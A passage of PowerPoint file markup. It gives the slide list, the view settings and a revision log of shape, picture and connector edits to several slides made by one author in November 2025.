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7" r:id="rId2"/>
    <p:sldId id="256" r:id="rId3"/>
    <p:sldId id="257" r:id="rId4"/>
    <p:sldId id="258" r:id="rId5"/>
    <p:sldId id="259" r:id="rId6"/>
    <p:sldId id="261" r:id="rId7"/>
    <p:sldId id="260" r:id="rId8"/>
    <p:sldId id="262" r:id="rId9"/>
    <p:sldId id="263" r:id="rId10"/>
    <p:sldId id="264" r:id="rId11"/>
    <p:sldId id="265" r:id="rId12"/>
    <p:sldId id="266" r:id="rId13"/>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774C9E-9E69-401D-981D-E7EC4FE5AB07}" v="26" dt="2025-11-03T01:48:28.9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5" autoAdjust="0"/>
    <p:restoredTop sz="86993" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="65" d="100"/>
          <a:sy n="65" d="100"/>
        </p:scale>
        <p:origin x="44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geni Manov" userId="aed5c0abc6a1aa6b" providerId="LiveId" clId="{02FFC218-E153-4223-A527-505A1937E6F0}"/>
    <pc:docChg chg="undo redo custSel addSld delSld modSld sldOrd">
      <pc:chgData name="Evgeni Manov" userId="aed5c0abc6a1aa6b" providerId="LiveId" clId="{02FFC218-E153-4223-A527-505A1937E6F0}" dt="2025-11-03T01:48:36.845" v="600" actId="47"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="addSp modSp mod setBg modNotesTx">
        <pc:chgData name="Evgeni Manov" userId="aed5c0abc6a1aa6b" providerId="LiveId" clId="{02FFC218-E153-4223-A527-505A1937E6F0}" dt="2025-11-02T23:39:44.688" v="528" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4169844317" sldId="256"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Evgeni Manov" userId="aed5c0abc6a1aa6b" providerId="LiveId" clId="{02FFC218-E153-4223-A527-505A1937E6F0}" dt="2025-11-02T22:34:39.878" v="413" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4169844317" sldId="256"/>
            <ac:spMk id="4" creationId="{D742E384-EA5B-4259-56CF-BD19272F0E71}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Evgeni Manov" userId="aed5c0abc6a1aa6b" providerId="LiveId" clId="{02FFC218-E153-4223-A527-505A1937E6F0}" dt="2025-11-02T22:35:22.457" v="417" actId="34135"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4169844317" sldId="256"/>
            <ac:spMk id="5" creationId="{8DB47540-0723-FD4F-71B2-47185566EEC3}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add">
          <ac:chgData name="Evgeni Manov" userId="aed5c0abc6a1aa6b" providerId="LiveId" clId="{02FFC218-E153-4223-A527-505A1937E6F0}" dt="2025-11-02T22:34:39.878" v="413" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4169844317" sldId="256"/>
            <ac:spMk id="12" creationId="{B9D7E975-9161-4F2D-AC53-69E1912F6B5D}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add">
          <ac:chgData name="Evgeni Manov" userId="aed5c0abc6a1aa6b" providerId="LiveId" clId="{02FFC218-E153-4223-A527-505A1937E6F0}" dt="2025-11-02T22:34:39.878" v="413" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4169844317" sldId="256"/>
            <ac:spMk id="14" creationId="{827DC2C4-B485-428A-BF4A-472D2967F47F}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add">
          <ac:chgData name="Evgeni Manov" userId="aed5c0abc6a1aa6b" providerId="LiveId" clId="{02FFC218-E153-4223-A527-505A1937E6F0}" dt="2025-11-02T22:34:39.878" v="413" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4169844317" sldId="256"/>
            <ac:spMk id="16" creationId="{463E6235-1649-4B47-9862-4026FC473B6F}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:graphicFrameChg chg="add mod modGraphic">
          <ac:chgData name="Evgeni Manov" userId="aed5c0abc6a1aa6b" providerId="LiveId" clId="{02FFC218-E153-4223-A527-505A1937E6F0}" dt="2025-11-02T23:39:32.780" v="440" actId="14100"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4169844317" sldId="256"/>
            <ac:graphicFrameMk id="2" creationId="{F3C54BEE-3744-73C7-BC6C-F53E64AFCF97}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
        <pc:picChg chg="mod ord">
          <ac:chgData name="Evgeni Manov" userId="aed5c0abc6a1aa6b" providerId="LiveId" clId="{02FFC218-E153-4223-A527-505A1937E6F0}" dt="2025-11-02T22:34:39.878" v="413" actId="26606"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4169844317" sldId="256"/>
            <ac:picMk id="7" creationId="{2166E42F-00E3-1FF2-933B-EE840988557D}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp mod delDesignElem modNotesTx">
        <pc:chgData name="Evgeni Manov" userId="aed5c0abc6a1aa6b" providerId="LiveId" clId="{02FFC218-E153-4223-A527-505A1937E6F0}" dt="2025-11-02T23:41:01.521" v="533" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1602405366" sldId="257"/>
        </pc:sldMkLst>
        <pc:spChg chg="add del">
          <ac:chgData name="Evgeni Manov" userId="aed5c0abc6a1aa6b" providerId="LiveId" clId="{02FFC218-E153-4223-A527-505A1937E6F0}" dt="2025-11-02T22:02:55.528" v="131"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1602405366" sldId="257"/>
            <ac:spMk id="13" creationId="{2151139A-886F-4B97-8815-729AD3831BBD}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Evgeni Manov" userId="aed5c0abc6a1aa6b" providerId="LiveId" clId="{02FFC218-E153-4223-A527-505A1937E6F0}" dt="2025-11-02T22:02:55.528" v="131"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1602405366" sldId="257"/>
            <ac:spMk id="15" creationId="{5428AC11-BFDF-42EF-80FF-717BBF909067}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Evgeni Manov" userId="aed5c0abc6a1aa6b" providerId="LiveId" clId="{02FFC218-E153-4223-A527-505A1937E6F0}" dt="2025-11-02T22:02:55.528" v="131"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1602405366" sldId="257"/>
            <ac:spMk id="17" creationId="{2CC56AF6-38E4-490B-8E2B-1A1037B4EDD4}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Evgeni Manov" userId="aed5c0abc6a1aa6b" providerId="LiveId" clId="{02FFC218-E153-4223-A527-505A1937E6F0}" dt="2025-11-02T22:02:55.528" v="131"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1602405366" sldId="257"/>
            <ac:spMk id="19" creationId="{2339A6F5-AD6A-4D80-8AD9-6290D13AC49F}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:graphicFrameChg chg="add mod modGraphic">
          <ac:chgData name="Evgeni Manov" userId="aed5c0abc6a1aa6b" providerId="LiveId" clId="{02FFC218-E153-4223-A527-505A1937E6F0}" dt="2025-11-02T23:40:47.925" v="532"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1602405366" sldId="257"/>
            <ac:graphicFrameMk id="3" creationId="{66AD1692-0419-43C8-5492-4EF1BD0C3D1E}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp mod delDesignElem modNotesTx">
        <pc:chgData name="Evgeni Manov" userId="aed5c0abc6a1aa6b" providerId="LiveId" clId="{02FFC218-E153-4223-A527-505A1937E6F0}" dt="2025-11-02T23:43:19.199" v="544" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="86963257" sldId="258"/>
        </pc:sldMkLst>
        <pc:spChg chg="add del">
          <ac:chgData name="Evgeni Manov" userId="aed5c0abc6a1aa6b" providerId="LiveId" clId="{02FFC218-E153-4223-A527-505A1937E6F0}" dt="2025-11-02T22:02:55.528" v="131"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="86963257" sldId="258"/>
            <ac:spMk id="13" creationId="{9CB95732-565A-4D2C-A3AB-CC460C0D3826}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Evgeni Manov" userId="aed5c0abc6a1aa6b" providerId="LiveId" clId="{02FFC218-E153-4223-A527-505A1937E6F0}" dt="2025-11-02T22:02:55.528" v="131"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="86963257" sldId="258"/>
            <ac:spMk id="15" creationId="{77F1AF47-AE98-4034-BD91-1976FA4D9C4C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Evgeni Manov" userId="aed5c0abc6a1aa6b" providerId="LiveId" clId="{02FFC218-E153-4223-A527-505A1937E6F0}" dt="2025-11-02T22:02:55.528" v="131"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="86963257" sldId="258"/>
            <ac:spMk id="17" creationId="{8EC0EE2B-2029-48DD-893D-F528E651B07D}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Evgeni Manov" userId="aed5c0abc6a1aa6b" providerId="LiveId" clId="{02FFC218-E153-4223-A527-505A1937E6F0}" dt="2025-11-02T22:02:55.528" v="131"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="86963257" sldId="258"/>
            <ac:spMk id="19" creationId="{45AE1D08-1ED1-4F59-B42F-4D8EA33DC8C6}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Evgeni Manov" userId="aed5c0abc6a1aa6b" providerId="LiveId" clId="{02FFC218-E153-4223-A527-505A1937E6F0}" dt="2025-11-02T22:02:55.528" v="131"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="86963257" sldId="258"/>
            <ac:spMk id="21" creationId="{9A79B912-88EA-4640-BDEB-51B3B11A026A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:graphicFrameChg chg="add mod modGraphic">
          <ac:chgData name="Evgeni Manov" userId="aed5c0abc6a1aa6b" providerId="LiveId" clId="{02FFC218-E153-4223-A527-505A1937E6F0}" dt="2025-11-02T23:42:51.205" v="543" actId="1076"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="86963257" sldId="258"/>
            <ac:graphicFrameMk id="3" creationId="{483463CB-A311-7A3A-CE60-CF11ECF6A101}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp mod delDesignElem modNotesTx">
        <pc:chgData name="Evgeni Manov" userId="aed5c0abc6a1aa6b" providerId="LiveId" clId="{02FFC218-E153-4223-A527-505A1937E6F0}" dt="2025-11-02T23:44:21.397" v="549" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="360192035" sldId="259"/>
        </pc:sldMkLst>
        <pc:spChg chg="add del">
          <ac:chgData name="Evgeni Manov" userId="aed5c0abc6a1aa6b" providerId="LiveId" clId="{02FFC218-E153-4223-A527-505A1937E6F0}" dt="2025-11-02T22:02:55.528" v="131"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="360192035" sldId="259"/>
            <ac:spMk id="13" creationId="{9CB95732-565A-4D2C-A3AB-CC460C0D3826}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Evgeni Manov" userId="aed5c0abc6a1aa6b" providerId="LiveId" clId="{02FFC218-E153-4223-A527-505A1937E6F0}" dt="2025-11-02T22:02:55.528" v="131"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="360192035" sldId="259"/>
            <ac:spMk id="15" creationId="{77F1AF47-AE98-4034-BD91-1976FA4D9C4C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Evgeni Manov" userId="aed5c0abc6a1aa6b" providerId="LiveId" clId="{02FFC218-E153-4223-A527-505A1937E6F0}" dt="2025-11-02T22:02:55.528" v="131"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="360192035" sldId="259"/>
            <ac:spMk id="17" creationId="{8EC0EE2B-2029-48DD-893D-F528E651B07D}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Evgeni Manov" userId="aed5c0abc6a1aa6b" providerId="LiveId" clId="{02FFC218-E153-4223-A527-505A1937E6F0}" dt="2025-11-02T22:02:55.528" v="131"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="360192035" sldId="259"/>
            <ac:spMk id="19" creationId="{45AE1D08-1ED1-4F59-B42F-4D8EA33DC8C6}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Evgeni Manov" userId="aed5c0abc6a1aa6b" providerId="LiveId" clId="{02FFC218-E153-4223-A527-505A1937E6F0}" dt="2025-11-02T22:02:55.528" v="131"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="360192035" sldId="259"/>
            <ac:spMk id="23" creationId="{9A79B912-88EA-4640-BDEB-51B3B11A026A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:graphicFrameChg chg="add mod modGraphic">
          <ac:chgData name="Evgeni Manov" userId="aed5c0abc6a1aa6b" providerId="LiveId" clId="{02FFC218-E153-4223-A527-505A1937E6F0}" dt="2025-11-02T23:44:03.373" v="548"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="360192035" sldId="259"/>
            <ac:graphicFrameMk id="3" creationId="{BB6FE77C-938E-3DC5-CF90-6EEA8A797513}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp mod delDesignElem modNotesTx">
        <pc:chgData name="Evgeni Manov" userId="aed5c0abc6a1aa6b" providerId="LiveId" clId="{02FFC218-E153-4223-A527-505A1937E6F0}" dt="2025-11-03T00:04:15.626" v="597" actId="207"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="373764814" sldId="260"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Evgeni Manov" userId="aed5c0abc6a1aa6b" providerId="LiveId" clId="{02FFC218-E153-4223-A527-505A1937E6F0}" dt="2025-11-02T22:36:46.259" v="434" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="373764814" sldId="260"/>
            <ac:spMk id="2" creationId="{237BE5B4-292C-8B95-CC5F-ED7368762AA1}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Evgeni Manov" userId="aed5c0abc6a1aa6b" providerId="LiveId" clId="{02FFC218-E153-4223-A527-505A1937E6F0}" dt="2025-11-02T22:02:55.528" v="131"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="373764814" sldId="260"/>
            <ac:spMk id="13" creationId="{7C98A213-5994-475E-B327-DC6EC27FBA8B}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Evgeni Manov" userId="aed5c0abc6a1aa6b" providerId="LiveId" clId="{02FFC218-E153-4223-A527-505A1937E6F0}" dt="2025-11-02T22:02:55.528" v="131"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="373764814" sldId="260"/>
            <ac:spMk id="15" creationId="{4B030A0D-0DAD-4A99-89BB-419527D6A64B}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:graphicFrameChg chg="add mod modGraphic">
          <ac:chgData name="Evgeni Manov" userId="aed5c0abc6a1aa6b" providerId="LiveId" clId="{02FFC218-E153-4223-A527-505A1937E6F0}" dt="2025-11-03T00:04:15.626" v="597" actId="207"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="373764814" sldId="260"/>
            <ac:graphicFrameMk id="3" creationId="{6DE557A0-5602-E489-3F61-AF2427C59B03}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
        <pc:picChg chg="mod">
          <ac:chgData name="Evgeni Manov" userId="aed5c0abc6a1aa6b" providerId="LiveId" clId="{02FFC218-E153-4223-A527-505A1937E6F0}" dt="2025-11-02T23:46:05.837" v="559" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="373764814" sldId="260"/>
            <ac:picMk id="4" creationId="{81FC8D22-B070-2452-1A8E-E817D605DB72}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="mod">
          <ac:chgData name="Evgeni Manov" userId="aed5c0abc6a1aa6b" providerId="LiveId" clId="{02FFC218-E153-4223-A527-505A1937E6F0}" dt="2025-11-02T23:46:09.248" v="560" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="373764814" sldId="260"/>
            <ac:picMk id="6" creationId="{9225C3CF-7986-05F1-9A4B-F9F85BE5DFB0}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="mod">
          <ac:chgData name="Evgeni Manov" userId="aed5c0abc6a1aa6b" providerId="LiveId" clId="{02FFC218-E153-4223-A527-505A1937E6F0}" dt="2025-11-02T23:46:12.768" v="561" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="373764814" sldId="260"/>
            <ac:picMk id="8" creationId="{E3E10DF8-D170-B335-9FB1-E27D605064EC}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp mod delDesignElem modNotesTx">
        <pc:chgData name="Evgeni Manov" userId="aed5c0abc6a1aa6b" providerId="LiveId" clId="{02FFC218-E153-4223-A527-505A1937E6F0}" dt="2025-11-02T23:45:49.633" v="558" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2763614839" sldId="261"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Evgeni Manov" userId="aed5c0abc6a1aa6b" providerId="LiveId" clId="{02FFC218-E153-4223-A527-505A1937E6F0}" dt="2025-11-02T22:36:24.475" v="425" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2763614839" sldId="261"/>
            <ac:spMk id="2" creationId="{025ACA49-5836-D6D0-5205-8C559E0D0804}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Evgeni Manov" userId="aed5c0abc6a1aa6b" providerId="LiveId" clId="{02FFC218-E153-4223-A527-505A1937E6F0}" dt="2025-11-02T22:02:55.528" v="131"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2763614839" sldId="261"/>
            <ac:spMk id="21" creationId="{C4879EFC-8E62-4E00-973C-C45EE9EC676D}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Evgeni Manov" userId="aed5c0abc6a1aa6b" providerId="LiveId" clId="{02FFC218-E153-4223-A527-505A1937E6F0}" dt="2025-11-02T22:02:55.528" v="131"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2763614839" sldId="261"/>
            <ac:spMk id="22" creationId="{D6A9C53F-5F90-40A5-8C85-5412D39C8C68}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:graphicFrameChg chg="add mod modGraphic">
          <ac:chgData name="Evgeni Manov" userId="aed5c0abc6a1aa6b" providerId="LiveId" clId="{02FFC218-E153-4223-A527-505A1937E6F0}" dt="2025-11-02T23:45:33.988" v="557" actId="14100"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2763614839" sldId="261"/>
            <ac:graphicFrameMk id="3" creationId="{8A9121D5-AC94-44EB-20A0-CC9C8A9AD5FB}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
        <pc:picChg chg="mod">
          <ac:chgData name="Evgeni Manov" userId="aed5c0abc6a1aa6b" providerId="LiveId" clId="{02FFC218-E153-4223-A527-505A1937E6F0}" dt="2025-11-02T23:44:33.049" v="550" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2763614839" sldId="261"/>
            <ac:picMk id="4" creationId="{89B71B29-267C-1CC0-3422-BAF635CE1B64}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="mod">
          <ac:chgData name="Evgeni Manov" userId="aed5c0abc6a1aa6b" providerId="LiveId" clId="{02FFC218-E153-4223-A527-505A1937E6F0}" dt="2025-11-02T23:44:38.082" v="551" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2763614839" sldId="261"/>
            <ac:picMk id="6" creationId="{19FABD5A-6E9E-1F09-CBD7-1D8D9CAF3085}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp mod delDesignElem modNotesTx">
        <pc:chgData name="Evgeni Manov" userId="aed5c0abc6a1aa6b" providerId="LiveId" clId="{02FFC218-E153-4223-A527-505A1937E6F0}" dt="2025-11-03T00:04:50.068" v="598" actId="207"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1675895404" sldId="262"/>
        </pc:sldMkLst>
        <pc:spChg chg="add del">
          <ac:chgData name="Evgeni Manov" userId="aed5c0abc6a1aa6b" providerId="LiveId" clId="{02FFC218-E153-4223-A527-505A1937E6F0}" dt="2025-11-02T23:56:41.568" v="567" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1675895404" sldId="262"/>
            <ac:spMk id="12" creationId="{4F7B9026-36AD-42E4-B172-8D68F3A339B4}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:graphicFrameChg chg="add mod modGraphic">
          <ac:chgData name="Evgeni Manov" userId="aed5c0abc6a1aa6b" providerId="LiveId" clId="{02FFC218-E153-4223-A527-505A1937E6F0}" dt="2025-11-03T00:04:50.068" v="598" actId="207"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1675895404" sldId="262"/>
            <ac:graphicFrameMk id="2" creationId="{D0638497-9AA1-8B7B-9EC3-67D37A786162}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
        <pc:picChg chg="mod ord">
          <ac:chgData name="Evgeni Manov" userId="aed5c0abc6a1aa6b" providerId="LiveId" clId="{02FFC218-E153-4223-A527-505A1937E6F0}" dt="2025-11-02T23:57:54.114" v="574" actId="14100"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1675895404" sldId="262"/>
            <ac:picMk id="3" creationId="{B9DEDCA1-2379-EE1F-AB3E-C9AE85D800AC}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="mod">
          <ac:chgData name="Evgeni Manov" userId="aed5c0abc6a1aa6b" providerId="LiveId" clId="{02FFC218-E153-4223-A527-505A1937E6F0}" dt="2025-11-02T23:57:13.862" v="571" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1675895404" sldId="262"/>
            <ac:picMk id="5" creationId="{4BE11390-EFD5-ECA3-3446-6C0B48FB4184}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="mod ord">
          <ac:chgData name="Evgeni Manov" userId="aed5c0abc6a1aa6b" providerId="LiveId" clId="{02FFC218-E153-4223-A527-505A1937E6F0}" dt="2025-11-02T23:57:06.769" v="570" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1675895404" sldId="262"/>
            <ac:picMk id="7" creationId="{3C654B66-91BA-0189-6C4A-C66601EEDCDD}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:cxnChg chg="add">
          <ac:chgData name="Evgeni Manov" userId="aed5c0abc6a1aa6b" providerId="LiveId" clId="{02FFC218-E153-4223-A527-505A1937E6F0}" dt="2025-11-02T23:56:41.568" v="567" actId="26606"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1675895404" sldId="262"/>
            <ac:cxnSpMk id="17" creationId="{DCD67800-37AC-4E14-89B0-F79DCB3FB86D}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="add">
          <ac:chgData name="Evgeni Manov" userId="aed5c0abc6a1aa6b" providerId="LiveId" clId="{02FFC218-E153-4223-A527-505A1937E6F0}" dt="2025-11-02T23:56:41.568" v="567" actId="26606"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1675895404" sldId="262"/>
            <ac:cxnSpMk id="19" creationId="{20F1788F-A5AE-4188-8274-F7F2E3833ECD}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp mod setBg delDesignElem modNotesTx">
        <pc:chgData name="Evgeni Manov" userId="aed5c0abc6a1aa6b" providerId="LiveId" clId="{02FFC218-E153-4223-A527-505A1937E6F0}" dt="2025-11-03T00:03:00.526" v="596" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2464368607" sldId="263"/>
        </pc:sldMkLst>
        <pc:spChg chg="add del">
          <ac:chgData name="Evgeni Manov" userId="aed5c0abc6a1aa6b" providerId="LiveId" clId="{02FFC218-E153-4223-A527-505A1937E6F0}" dt="2025-11-02T03:17:38.828" v="26" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2464368607" sldId="263"/>
            <ac:spMk id="9" creationId="{80CCAACE-815D-4A79-875A-B7EFC28F7D2B}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Evgeni Manov" userId="aed5c0abc6a1aa6b" providerId="LiveId" clId="{02FFC218-E153-4223-A527-505A1937E6F0}" dt="2025-11-02T03:16:28.001" v="23" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2464368607" sldId="263"/>
            <ac:spMk id="12" creationId="{11BE3FA7-0D70-4431-814F-D8C40576EA93}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Evgeni Manov" userId="aed5c0abc6a1aa6b" providerId="LiveId" clId="{02FFC218-E153-4223-A527-505A1937E6F0}" dt="2025-11-03T00:00:22.183" v="583" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2464368607" sldId="263"/>
            <ac:spMk id="14" creationId="{A9F529C3-C941-49FD-8C67-82F134F64BDB}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Evgeni Manov" userId="aed5c0abc6a1aa6b" providerId="LiveId" clId="{02FFC218-E153-4223-A527-505A1937E6F0}" dt="2025-11-03T00:00:22.183" v="583" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2464368607" sldId="263"/>
            <ac:spMk id="16" creationId="{20586029-32A0-47E5-9AEC-AE3ABA6B94D0}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Evgeni Manov" userId="aed5c0abc6a1aa6b" providerId="LiveId" clId="{02FFC218-E153-4223-A527-505A1937E6F0}" dt="2025-11-03T00:00:22.179" v="582" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2464368607" sldId="263"/>
            <ac:spMk id="23" creationId="{42A4FC2C-047E-45A5-965D-8E1E3BF09BC6}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add">
          <ac:chgData name="Evgeni Manov" userId="aed5c0abc6a1aa6b" providerId="LiveId" clId="{02FFC218-E153-4223-A527-505A1937E6F0}" dt="2025-11-03T00:00:22.183" v="583" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2464368607" sldId="263"/>
            <ac:spMk id="25" creationId="{2AEAFA59-923A-4F54-8B49-44C970BCC323}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add">
          <ac:chgData name="Evgeni Manov" userId="aed5c0abc6a1aa6b" providerId="LiveId" clId="{02FFC218-E153-4223-A527-505A1937E6F0}" dt="2025-11-03T00:00:22.183" v="583" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2464368607" sldId="263"/>
            <ac:spMk id="26" creationId="{22F15A2D-2324-487D-A02A-BF46C5C580EB}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add">
          <ac:chgData name="Evgeni Manov" userId="aed5c0abc6a1aa6b" providerId="LiveId" clId="{02FFC218-E153-4223-A527-505A1937E6F0}" dt="2025-11-03T00:00:22.183" v="583" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2464368607" sldId="263"/>
